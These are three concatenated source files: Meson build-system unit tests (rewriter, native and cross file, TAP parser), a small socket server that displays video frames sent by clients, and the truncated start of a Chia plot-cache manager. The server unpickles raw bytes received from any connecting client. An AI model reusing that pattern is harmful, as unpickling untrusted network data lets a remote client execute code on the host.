'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
if os.path.exists('/etc/debian_version'):
rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc != 0:
# Python 2 will be removed in Debian Bullseye, thus we must
# remove the build dependency on python2-dev. Keep the tests
# but only run them if dev packages are available.
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', 'python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functioality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
pass
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
sys.exit(main())
|
server.py
|
import socket, cv2, pickle, struct
import imutils
import threading
import pyshine as ps
import cv2
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host_name = socket.gethostname()
host_ip = socket.gethostbyname(host_name)
print('HOST IP:',host_ip)
port = 9999
socket_address = (host_ip,port)
server_socket.bind(socket_address)
server_socket.listen()
print("Listening at",socket_address)
def show_client(addr,client_socket):
try:
print('CLIENT {} CONNECTED!'.format(addr))
if client_socket:
data = b""
payload_size = struct.calcsize("Q")
while True:
while len(data) < payload_size:
packet = client_socket.recv(4*1024)
if not packet: break
data+=packet
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("Q",packed_msg_size)[0]
while len(data) < msg_size:
data += client_socket.recv(4*1024)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
text = f"CLIENT: {addr}"
frame = ps.putBText(frame,text,10,10,vspace=10,hspace=1,font_scale=0.7,background_RGB=(255,0,0),text_RGB=(255,250,250))
cv2.imshow(f"FROM {addr}",frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
break
client_socket.close()
except Exception as e:
print(f"CLINET {addr} DISCONNECTED")
pass
while True:
client_socket,addr = server_socket.accept()
thread = threading.Thread(target=show_client, args=(addr,client_socket))
thread.start()
print("TOTAL CLIENTS ",threading.activeCount() - 1)
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from chia.util.generator_tools import list_to_batches
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
